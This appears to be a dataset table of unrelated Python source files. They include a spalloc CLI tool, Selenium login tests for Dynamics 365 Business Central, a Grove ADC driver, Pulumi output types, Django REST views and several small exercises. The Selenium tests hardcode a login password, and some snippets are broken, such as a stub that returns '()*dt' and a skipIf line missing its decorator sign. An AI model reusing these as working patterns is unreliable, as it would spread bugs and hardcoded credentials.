index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,500 | d0ac471b0235356ec39e3f3ba9f6a3f2dd8055e9 | # Copyright (c) 2016 The University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Command-line tool to find out where a particular chip or board resides.
The ``spalloc-where-is`` command allows you to query boards by coordinate, by
physical location, by chip or by job. In response to a query, a standard set of
information is displayed as shown in the example below::
$ spalloc-where-is --job-chip 24 14, 3
Machine: my-machine
Physical Location: Cabinet 2, Frame 4, Board 7
Board Coordinate: (3, 4, 0)
Machine Chip Coordinates: (38, 51)
Coordinates within board: (2, 3)
Job using board: 24
Coordinates within job: (14, 3)
In this example we ask, 'where is chip (14, 3) in job 24'? We discover that:
* The chip is the machine named 'my-machine' on the board in cabinet 2, frame
4, board 7.
* This board's logical board coordinates are (3, 4, 0). These logical
coordinates may be used to specifically request this board from Spalloc in
the future.
* If 'my-machine' were booted as a single large machine, the chip we queried
would be chip (38, 51). This may be useful for cross-referencing with
diagrams produced by SpiNNer_.
* The chip in question is chip (2, 3) its board. This may be useful when
reporting faulty chips/replacing boards..
* The job currently running on the board has ID 24. Obviously in this example
we already knew this but this may be useful when querying by board.
* Finally, we're told that the queried chip has the coordinates (14, 3) in the
machine allocated to job 24. Again, this information may be more useful when
querying by board.
.. _SpiNNer: https://github.com/SpiNNakerManchester/SpiNNer
To query by logical board coordinate::
spalloc-where-is --board MACHINE X Y Z
To query by physical board location::
spalloc-where-is --physical MACHINE CABINET FRAME BOARD
To query by chip coordinate (as if the machine were booted as one large
machine)::
spalloc-where-is --chip MACHINE X Y
To query by chip coordinate of chips allocated to a job::
spalloc-where-is --job-chip JOB_ID X Y
"""
import sys
import argparse
from spalloc_client import __version__
from spalloc_client.term import render_definitions
from .support import Terminate, Script
class WhereIsScript(Script):
def __init__(self):
super().__init__()
self.parser = None
self.where_is_kwargs = None
self.show_board_chip = None
def get_parser(self, cfg): # @UnusedVariable
parser = argparse.ArgumentParser(
description="Find out the location (physical or logical) of a "
"chip or board.")
parser.add_argument(
"--version", "-V", action="version", version=__version__)
control_args = parser.add_mutually_exclusive_group(required=True)
control_args.add_argument(
"--board", "-b", "--logical", "-l", nargs=4,
metavar=("MACHINE", "X", "Y", "Z"),
help="specify the logical board coordinate")
control_args.add_argument(
"--physical", "-p", nargs=4,
metavar=("MACHINE", "CABINET", "FRAME", "BOARD"),
help="specify a board's physical location")
control_args.add_argument(
"--chip", "-c", nargs=3, metavar=("MACHINE", "X", "Y"),
help="specify a board by chip coordinates (as if the whole "
"machine is being used)")
control_args.add_argument(
"--job-chip", "-j", nargs=3, metavar=("JOB_ID", "X", "Y"),
help="specify the chip coordinates of a chip within a job's "
"boards")
self.parser = parser
return parser
def verify_arguments(self, args):
try:
if args.board:
machine, x, y, z = args.board
self.where_is_kwargs = {
"machine": machine,
"x": int(x),
"y": int(y),
"z": int(z),
}
self.show_board_chip = False
elif args.physical:
machine, c, f, b = args.physical
self.where_is_kwargs = {
"machine": machine,
"cabinet": int(c),
"frame": int(f),
"board": int(b),
}
self.show_board_chip = False
elif args.chip:
machine, x, y = args.chip
self.where_is_kwargs = {
"machine": machine,
"chip_x": int(x),
"chip_y": int(y),
}
self.show_board_chip = True
elif args.job_chip:
job_id, x, y = args.job_chip
self.where_is_kwargs = {
"job_id": int(job_id),
"chip_x": int(x),
"chip_y": int(y),
}
self.show_board_chip = True
except ValueError as e:
self.parser.error("Error: {}".format(e))
def body(self, client, args): # @UnusedVariable
# Ask the server
location = client.where_is(**self.where_is_kwargs)
if location is None:
raise Terminate(4, "No boards at the specified location")
out = dict()
out["Machine"] = location["machine"]
out["Physical location"] = "Cabinet {}, Frame {}, Board {}".format(
*location["physical"])
out["Board coordinate"] = tuple(location["logical"])
out["Machine chip coordinates"] = tuple(location["chip"])
if self.show_board_chip:
out["Coordinates within board"] = tuple(location["board_chip"])
out["Job using board"] = location["job_id"]
if location["job_id"]:
out["Coordinates within job"] = tuple(location["job_chip"])
print(render_definitions(out))
main = WhereIsScript()
if __name__ == "__main__": # pragma: no cover
sys.exit(main())
|
23,501 | e871514d810b837a8c00eeea5a8658110e4062a2 | #!/usr/bin/python3
from tkinter import *
from tkinter import messagebox
main = Tk()
main.title('Pomodoro Clock')
main.geometry("300x200")
main.option_add('*Dialog.msg.width', 20)
# in the same window
#def startPomo():
# global timeProvided
# timeProvided = time.get()
#print("Pomodoro Clock " + timeProvided)
# lbl.config(text='Time provided: '+ timeProvided)
# in the same window
#submit = Button(main, text = "Submit", command = startPomo)
#submit.place(x = 100, y = 100)
#lbl = Label(main)
#lbl.pack()
ERROR_DURATION = 3000
def popupMessage():
global totalTime
try:
totalTime = time.get()
totalTime = int(totalTime)
msg = messagebox.showinfo( "Pomodoro Clock", totalTime)
except ValueError:
top = Toplevel()
top.title('Error')
Message(top, text=totalTime+" is not any time.", padx=70, pady=70).pack()
top.after(ERROR_DURATION, top.destroy)
timeLabel = Label(main, text = "Enter time")
timeLabel.pack()
time = Entry(main)
time.pack()
# create a new popup
popup = Button(main, text = "Submit", command = popupMessage)
popup.place(x = 100,y = 100)
main.mainloop()
|
23,502 | 31760080dd4460841bd6d3d41b29a1b6bdd7b358 | from time import sleep
from selenium import webdriver
import unittest, time, re, random, sys
sys.path.append("./models")
sys.path.append("./page_obj")
from models import mytest,function
from page_obj.loginPage import login
from mytest import *
from selenium.webdriver.common.by import By
from xml.dom import minidom
from data.projectpath import ProjectPath
dom = minidom.parse(ProjectPath+'\\data\\info.xml')
#dom = minidom.parse('C:\\Project\\TAGNAV_para\\data\\info.xml')
root = dom.documentElement
usernames = dom.getElementsByTagName('username')
Chs=dom.getElementsByTagName('Chrome')
Ies=dom.getElementsByTagName('IE')
Ffs=dom.getElementsByTagName('Firefox')
Eds=dom.getElementsByTagName('Edge')
Ch=int(Chs[0].firstChild.data)
Ie=int(Ies[0].firstChild.data)
Ff=int(Ffs[0].firstChild.data)
Ed=int(Eds[0].firstChild.data)
unittest.skipIf(Ch==0,'skip')
class loginTest_Chrome(Mytest):
'''Test Login into NAV in chrome'''
print(Ch,Ie,Ff,Ed,usernames[0])
def user_login_verify(self,username='',password=''):
'''function note'''
login(self.driver).user_login(username,password)
def test_login1(self):
'''login with username,password empty'''
self.user_login_verify()
po=login(self.driver)
try:
print ("cuowutishi",(po.error_hint()),'woshitishijieshu')
self.assertEqual(po.error_hint1(),'User name is required.')
self.assertEqual(po.error_hint2(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_empty.png')
def test_login2(self):
'''login with username empty'''
self.user_login_verify(password='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_empty.png')
def test_login3(self):
'''login with password empty'''
self.user_login_verify(username='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'pawd_empty.png')
def test_login4(self):
'''login with wrong username password'''
self.user_login_verify(password='123',username='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_wrong.png')
def test_login5(self):
'''login with correct username password'''
self.user_login_verify(username='adnm',password='@dnm2012')
po=login(self.driver)
try:
self.assertEqual(po.login_success(),'Dynamics 365 Business Central')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_correct.png')
login(self.driver).confirm_caution()
@unittest.skipIf(Ie==0,'skip')
class loginTest_IE(TFS_5555_ie):
'''Test Login into NAV in ie'''
def user_login_verify(self,username='',password=''):
'''function note'''
login(self.driver).user_login(username,password)
def test_login1(self):
'''login with username,password empty'''
self.user_login_verify()
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
self.assertEqual(po.error_hint2(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_empty.png')
def test_login2(self):
'''login with username empty'''
self.user_login_verify(password='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_empty.png')
def test_login3(self):
'''login with password empty'''
self.user_login_verify(username='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'pawd_empty.png')
def test_login4(self):
'''login with wrong username password'''
self.user_login_verify(password='123',username='123')
po=login(self.driver)
sleep(3)
try:
self.assertEqual(po.error_hint1(),'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_wrong.png')
def test_login5(self):
'''login with correct username password'''
self.user_login_verify(username='adnm',password='@dnm2012')
po=login(self.driver)
sleep(3)
try:
self.assertEqual(po.login_success(),'Dynamics 365 Business Central')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_correct.png')
login(self.driver).confirm_caution()
@unittest.skipIf (Ff==0,'skip')
class loginTest_FF(L_5557_firefox):
'''Test Login into NAV in firefox'''
def user_login_verify(self,username='',password=''):
'''function note'''
login(self.driver).user_login(username,password)
def test_login1(self):
'''login with username,password empty'''
self.user_login_verify()
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
self.assertEqual(po.error_hint2(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_empty.png')
def test_login2(self):
'''login with username empty'''
self.user_login_verify(password='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_empty.png')
def test_login3(self):
'''login with password empty'''
self.user_login_verify(username='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'pawd_empty.png')
def test_login4(self):
'''login with wrong username password'''
self.user_login_verify(password='123',username='123')
po=login(self.driver)
sleep(30)
try:
self.assertEqual(po.error_hint1(),'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_wrong.png')
def test_login5(self):
'''login with correct username password'''
self.user_login_verify(username='adnm',password='@dnm2012')
po=login(self.driver)
sleep(30)
try:
self.assertEqual(po.login_success(),'Dynamics 365 Business Central')
except AssertionError as e:
self.verificationErrors.append(str(e))
login(self.driver).confirm_caution()
function.insert_img(self.driver,'user_pawd_correct.png')
@unittest.skipIf (Ed==0,'skip')
class loginTest_Edge(L_5558_edge):
'''Test Login into NAV in edge'''
def user_login_verify(self,username='',password=''):
'''function note'''
login(self.driver).user_login(username,password)
def test_login1(self):
'''login with username,password empty'''
self.user_login_verify()
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
self.assertEqual(po.error_hint2(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_empty.png')
def test_login2(self):
'''login with username empty'''
self.user_login_verify(password='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'User name is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_empty.png')
def test_login3(self):
'''login with password empty'''
self.user_login_verify(username='123')
po=login(self.driver)
try:
self.assertEqual(po.error_hint1(),'Password is required.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'pawd_empty.png')
def test_login4(self):
'''login with wrong username password'''
self.user_login_verify(password='123',username='123')
po=login(self.driver)
sleep(5)
try:
self.assertEqual(po.error_hint1(),'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
except AssertionError as e:
self.verificationErrors.append(str(e))
function.insert_img(self.driver,'user_pawd_wrong.png')
def test_login5(self):
'''login with correct username password'''
self.user_login_verify(username='adnm',password='@dnm2012')
po=login(self.driver)
sleep(5)
try:
self.assertEqual(po.login_success(),'Dynamics 365 Business Central')
except AssertionError as e:
self.verificationErrors.append(str(e))
login(self.driver).confirm_caution()
function.insert_img(self.driver,'user_pawd_correct.png')
if __name__ == "__main__":
unittest.main()
|
23,503 | 698fe37cf7b1febd9c2547065fd9166a8f8d7ec3 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['toolbar'] = 'None'
fig = plt.figure(figsize=(10, 10))
res = 1000
len = 10
x0, y0 = 1, 1
def dx(r, dt):
return ()*dt
def dy(r, dt):
return ()*dt
def main():
arr_x = np.empty(res)
arr_y = np.empty(res)
dt = len/res
arr_x[0] = x0
arr_y[0] = y0
for i in range(1, res):
arr_x[i] = arr_x[i-1] + dx([arr_x[i-1],arr_y[i-1]], dt)
arr_y[i] = arr_y[i-1] + dy([arr_x[i-1],arr_y[i-1]], dt)
print("done")
plt.plot(arr_x, arr_y)
plt.show()
if __name__ == "__main__":
main()
|
23,504 | a022d25521c9691b881f1b9a8b3265f72710ac26 | string = '555.2'
print(string.isnumeric())
string = "thaathaa"
print( string.isnumeric())
|
23,505 | 5f9b4b486a312eb28ba5e5432cd00e76cb615b1e | class View:
def __init__(self, axis1, axis2=None, bins=100, same_scale=False,
axis1_values=None, axis2_values=None, **kwargs):
"""
Plot view on one or two axis to be generated from event data
The possible specifiers are defined in McStasEvenData and are
x : x position [m]
y : x position [m]
z : x position [m]
vx : x velocity [m/s]
vy : x velocity [m/s]
vz : x velocity [m/s]
speed : [m/s]
dx : divergence x [deg]
dy : divergence y [deg]
t : time [s]
l : wavelength [AA]
e : energy [meV]
Parameters:
axis1 : str
Specifier for first axis to be shown
axis2 : str (optional)
Specifier for second axis to be shown
bins : int or [int, int]
Number of bins for generation of histogram
axis1_values : float or list of floats
Values that will be plotted as lines on plot
axis2_values : float or list of floats
Values that will be plotted as lines on plot
same_scale : bool
Controls whether all displays of this view is on same ranges
"""
self.same_scale = same_scale
self.axis1 = axis1
self.axis1_limits = None
if isinstance(axis1_values, (float, int)):
axis1_values = [axis1_values]
self.axis1_values = axis1_values
self.axis2 = axis2
self.axis2_limits = None
if isinstance(axis2_values, (float, int)):
axis2_values = [axis2_values]
self.axis2_values = axis2_values
self.bins = bins
self.plot_options = kwargs
def __repr__(self):
string = f"View ({self.axis1}"
if self.axis2 is not None:
string += f", {self.axis2}"
string += ")"
string = string.ljust(25)
string += f" bins: {str(self.bins)}"
return string
def set_axis1_limits(self, start, end):
"""
Sets the axis1 limits
"""
if start > end:
raise ValueError("Start point over end for this view.")
self.axis1_limits = start, end
def set_axis2_limits(self, start, end):
"""
Sets the axis2 limits
"""
if start > end:
raise ValueError("Start point over end for this view.")
self.axis2_limits = start, end
def clear_limits(self):
"""
Clears all limits
"""
self.axis1_limits = None
self.axis2_limits = None |
23,506 | 0d57c54bd34e1ba574c372da70d8451b92087999 | '''
## License
The MIT License (MIT)
Grove 8 channels 12 bit ADC Hat for the Raspberry Pi, used to connect grove sensors.
Copyright (C) 2018 Seeed Technology Co.,Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
from grove.i2c import Bus
ADC_DEFAULT_IIC_ADDR = 0X04
ADC_CHAN_NUM = 8
REG_RAW_DATA_START = 0X10
REG_VOL_START = 0X20
REG_RTO_START = 0X30
REG_SET_ADDR = 0XC0
class Pi_hat_adc():
def __init__(self,bus_num=1,addr=ADC_DEFAULT_IIC_ADDR):
self.bus=Bus(bus_num)
self.addr=addr
#get all raw adc data,THe max value is 4095,cause it is 12 Bit ADC
def get_all_adc_raw_data(self):
array = []
for i in range(ADC_CHAN_NUM):
data=self.bus.read_i2c_block_data(self.addr,REG_RAW_DATA_START+i,2)
val=data[1]<<8|data[0]
array.append(val)
return array
def get_nchan_adc_raw_data(self,n):
data=self.bus.read_i2c_block_data(self.addr,REG_RAW_DATA_START+n,2)
val =data[1]<<8|data[0]
return val
#get all data with unit mv.
def get_all_vol_milli_data(self):
array = []
for i in range(ADC_CHAN_NUM):
data=self.bus.read_i2c_block_data(self.addr,REG_VOL_START+i,2)
val=data[1]<<8|data[0]
array.append(val)
return array
def get_nchan_vol_milli_data(self,n):
data=self.bus.read_i2c_block_data(self.addr,REG_VOL_START+n,2)
val =data[1]<<8|data[0]
return val
#get all data ratio,unit is 0.1%
def get_all_ratio_0_1_data(self):
array = []
for i in range(ADC_CHAN_NUM):
data=self.bus.read_i2c_block_data(self.addr,REG_RTO_START+i,2)
val=data[1]<<8|data[0]
array.append(val)
return array
def get_nchan_ratio_0_1_data(self,n):
data=self.bus.read_i2c_block_data(self.addr,REG_RTO_START+n,2)
val =data[1]<<8|data[0]
return val
ADC = Pi_hat_adc()
def main():
raw_data=ADC.get_all_adc_raw_data()
vol_data=ADC.get_all_vol_milli_data()
ratio_data=ADC.get_all_ratio_0_1_data()
print("raw data for each channel:(1-8chan)(12 bit-max=4096):")
print(raw_data)
print("voltage for each channel:(unit:mv,max=3300mv):")
print(vol_data)
print ("ratio for each channel(unit 0.1%,max=100.0%):")
print(ratio_data)
print(" ")
print("NOTICE!!!:")
print("The default setting of ADC PIN is floating_input.")
print(" ")
if __name__ == '__main__':
main()
|
23,507 | b99d8aafee4fe75e584a77d0a1f506f2f28464d6 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetSubnetsSubnetResult',
'GetVpdsVpdResult',
]
@pulumi.output_type
class GetSubnetsSubnetResult(dict):
def __init__(__self__, *,
cidr: str,
create_time: str,
gmt_modified: str,
id: str,
message: str,
resource_group_id: str,
status: str,
subnet_id: str,
subnet_name: str,
type: str,
vpd_id: str,
zone_id: str):
"""
:param str cidr: Network segment
:param str create_time: The creation time of the resource
:param str gmt_modified: Modification time
:param str id: The ID of the resource.
:param str message: Error message
:param str resource_group_id: Resource Group ID.
:param str status: The status of the resource.
:param str subnet_id: Primary key ID.
:param str subnet_name: The Subnet name.
:param str type: Eflo subnet usage type, optional value:
- General type is not filled in
- OOB:OOB type
- LB: LB type
:param str vpd_id: The Eflo VPD ID.
:param str zone_id: The zone ID of the resource.
"""
pulumi.set(__self__, "cidr", cidr)
pulumi.set(__self__, "create_time", create_time)
pulumi.set(__self__, "gmt_modified", gmt_modified)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "message", message)
pulumi.set(__self__, "resource_group_id", resource_group_id)
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "subnet_id", subnet_id)
pulumi.set(__self__, "subnet_name", subnet_name)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "vpd_id", vpd_id)
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter
def cidr(self) -> str:
"""
Network segment
"""
return pulumi.get(self, "cidr")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> str:
"""
The creation time of the resource
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="gmtModified")
def gmt_modified(self) -> str:
"""
Modification time
"""
return pulumi.get(self, "gmt_modified")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def message(self) -> str:
"""
Error message
"""
return pulumi.get(self, "message")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> str:
"""
Resource Group ID.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter
def status(self) -> str:
"""
The status of the resource.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
Primary key ID.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="subnetName")
def subnet_name(self) -> str:
"""
The Subnet name.
"""
return pulumi.get(self, "subnet_name")
@property
@pulumi.getter
def type(self) -> str:
"""
Eflo subnet usage type, optional value:
- General type is not filled in
- OOB:OOB type
- LB: LB type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="vpdId")
def vpd_id(self) -> str:
"""
The Eflo VPD ID.
"""
return pulumi.get(self, "vpd_id")
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> str:
"""
The zone ID of the resource.
"""
return pulumi.get(self, "zone_id")
@pulumi.output_type
class GetVpdsVpdResult(dict):
def __init__(__self__, *,
cidr: str,
create_time: str,
gmt_modified: str,
id: str,
resource_group_id: str,
status: str,
vpd_id: str,
vpd_name: str):
"""
:param str cidr: CIDR network segment
:param str create_time: The creation time of the resource
:param str gmt_modified: Modification time
:param str id: The id of the vpd.
:param str resource_group_id: The Resource group id
:param str status: The Vpd status. Valid values: `Available`, `Not Available`, `Executing`, `Deleting`,
:param str vpd_id: The id of the vpd.
:param str vpd_name: The Name of the VPD.
"""
pulumi.set(__self__, "cidr", cidr)
pulumi.set(__self__, "create_time", create_time)
pulumi.set(__self__, "gmt_modified", gmt_modified)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "resource_group_id", resource_group_id)
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "vpd_id", vpd_id)
pulumi.set(__self__, "vpd_name", vpd_name)
@property
@pulumi.getter
def cidr(self) -> str:
"""
CIDR network segment
"""
return pulumi.get(self, "cidr")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> str:
"""
The creation time of the resource
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="gmtModified")
def gmt_modified(self) -> str:
"""
Modification time
"""
return pulumi.get(self, "gmt_modified")
@property
@pulumi.getter
def id(self) -> str:
"""
The id of the vpd.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> str:
"""
The Resource group id
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter
def status(self) -> str:
"""
The Vpd status. Valid values: `Available`, `Not Available`, `Executing`, `Deleting`,
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="vpdId")
def vpd_id(self) -> str:
"""
The id of the vpd.
"""
return pulumi.get(self, "vpd_id")
@property
@pulumi.getter(name="vpdName")
def vpd_name(self) -> str:
"""
The Name of the VPD.
"""
return pulumi.get(self, "vpd_name")
|
23,508 | 4df63a5bff09ac2ccc131af7712ec85367f33e2c | import torch as th
from torchvision.datasets import CIFAR10
from torchvision.transforms import Compose, Normalize, ToTensor
from pro_gan_pytorch.PRO_GAN import ConditionalProGAN
# create the dataset:
dataset = CIFAR10("../data/cifar-10/cifar-10_with_labels",
transform=Compose((
ToTensor(),
Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
)))
# create the conditional pro-gan
cond_pro_gan = ConditionalProGAN(
num_classes=10,
depth=4,
device=th.device("cuda")
)
# train the model
cond_pro_gan.train(
dataset=dataset,
epochs=[20, 20, 20, 20],
batch_sizes=[128, 128, 128, 128],
fade_in_percentage=[50, 50, 50, 50],
feedback_factor=5,
sample_dir="training_runs/cifar-10/samples",
save_dir="training_runs/cifar-10/models",
log_dir="training_runs/cifar-10/models"
)
|
23,509 | 25d55643e841d6a95af0649c0347c9dc10a1dd7f | #Python05_9_CollectionList06_신동혁
a=[1,2,3]
a.append(4)
print(a)
a.append([5,6])
print(a)
print('-'*20)
#리스트 정렬(sort)
a=[1,4,2,3]
a.sort()
print(a)
a=['b','c','a']
a.sort()
print(a)
|
23,510 | 8b372b368b25d83d7e2af84f1d5019d830da9bf5 | import numpy as np
import cv2
video = cv2.VideoCapture('video/test1.mp4')
while True:
ret, orig_frame = video.read()
if not ret:
video = cv2.VideoCapture('video/test1.mp4')
continue
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(orig_frame, cv2.COLOR_BGR2GRAY)
# cv2.imshow('temp', gray)
# cv2.waitKey(2000)
faces = face_cascade.detectMultiScale(gray, scaleFactor=1.02, minNeighbors=5)
if len(faces) is not 0:
# print (type(faces))
print(len(faces))
print (faces)
for face in faces:
x, y, w, h = face
cv2.rectangle(gray, (x,y), (x+w,y+h), (0,255,0), 3)
# else:
# print ("None faces detected")
cv2.imshow('Frame', gray)
key = cv2.waitKey(15)
if key == 27:
break
video.release()
cv2.destroyAllWindows()
|
23,511 | c5edfe3fc77b3eab6ea6e9c093f4a6564840bd5c | #class Prime_No(object):
def is_prime_number(num):
prime_numbers = []
if num < 2:
return False
if type(num) != int:
return "Must be an integer"
for i in range(2, num +1):
for j in range(2,i):
if (i % j) == 0:
break
else:
prime_numbers.append(i)
return prime_numbers
print is_prime_number(23)
|
23,512 | 8d862e94493caa0ee011f8586c496cd1d429ff67 | from django.urls import path
from player import views
urlpatterns = [
path('upload', views.Upload.as_view()),
path('musics', views.MusicsList.as_view()),
path('music_one/<int:pk>', views.MusicDetail.as_view()),
] |
23,513 | d4463ee136967c190d45b62cba8b098f112c80a9 | # -*- coding: utf-8 -*-
# Authors: Y. Jia <ytjia.zju@gmail.com>
"""
Given a collection of intervals, merge all overlapping intervals.
https://leetcode.com/problems/merge-intervals/description/
"""
# Definition for an interval.
class Interval(object):
def __init__(self, s=0, e=0):
self.start = s
self.end = e
def __eq__(self, other):
return self.start == other.start and self.end == other.end
class Solution(object):
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
lens = len(intervals)
if lens <= 1:
return intervals
merged_intervals = list()
intervals.sort(key=lambda interval: interval.start)
i = 0
j = i + 1
while j < lens:
if intervals[i].end >= intervals[j].start:
intervals[i].end = max(intervals[i].end, intervals[j].end)
j += 1
else:
merged_intervals.append(intervals[i])
i = j
j = i + 1
merged_intervals.append(intervals[i])
return merged_intervals
|
23,514 | c13fb7fb5bbb89d87727734dd940f43acd65763c | # from .models import Semester
# from django.views.decorators.csrf import csrf_exempt
# from .serializers import SemesterSerializer
# from django.views import generic
# from rest_framework import viewsets, filters
# from django.http import HttpResponse
# @csrf_exempt
# def index(request):
# return HttpResponse("hello")
# class SemesterViewSet(viewsets.ModelViewSet):
# '''
# Get all Semester
# '''
# queryset = Semester.objects.all()
# serializer_class = SemesterSerializer
from .models import Semester
from .serializers import SemesterSerializer
# from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
@api_view(['GET','POST'])
def SemesterList(request,format=None):
if request.method == 'GET':
semester = Semester.objects.all()
serializer = SemesterSerializer(semester,many=True)
return Response(serializer.data)
if request.method == 'POST':
# print(request.data['studname'])
# return Response(status=status.HTTP_404_NOT_FOUND)
serializer = SemesterSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data,status=status.HTTP_201_CREATED)
return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET','PUT','DELETE'])
def SemesterDetail(request,pk,format=None):
# print("coming\n\n")
try:
semester = Semester.objects.get(pk=pk)
except Semester.DoesNotExist:
# return Response(status=status.HTTP_404_NOT_FOUND)
serializer = SemesterSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data,status=status.HTTP_201_CREATED)
return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)
if request.method == 'GET':
serializer = SemesterSerializer(semester)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = SemesterSerializer(semester,data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data,status=status.HTTP_201_CREATED)
return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
semester.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
|
23,515 | def510854f605e2ef69291b3cd6c81c600e8bf64 | """
This is a setup.py script generated by py2applet
Usage:
python setup.py py2app
"""
from setuptools import setup
APP = ['AgSoft.py']
DATA_FILES = [('',['data'])]
OPTIONS = {'argv_emulation': True,
'includes':['tkinter'],
'iconfile': '/Users/amjadali/Desktop/AgSoft3/icon2.icns'}
setup(
app=APP,
data_files=DATA_FILES,
py_modules=['fileOpen','fileOpen2','firstFrame','runOptimum','showRslt','tables'],
options={'py2app' : OPTIONS},
setup_requires=['py2app'],
)
|
23,516 | 23732a02a4224ca02a349d32ab3394b89dcb484b | #import pandas as pd
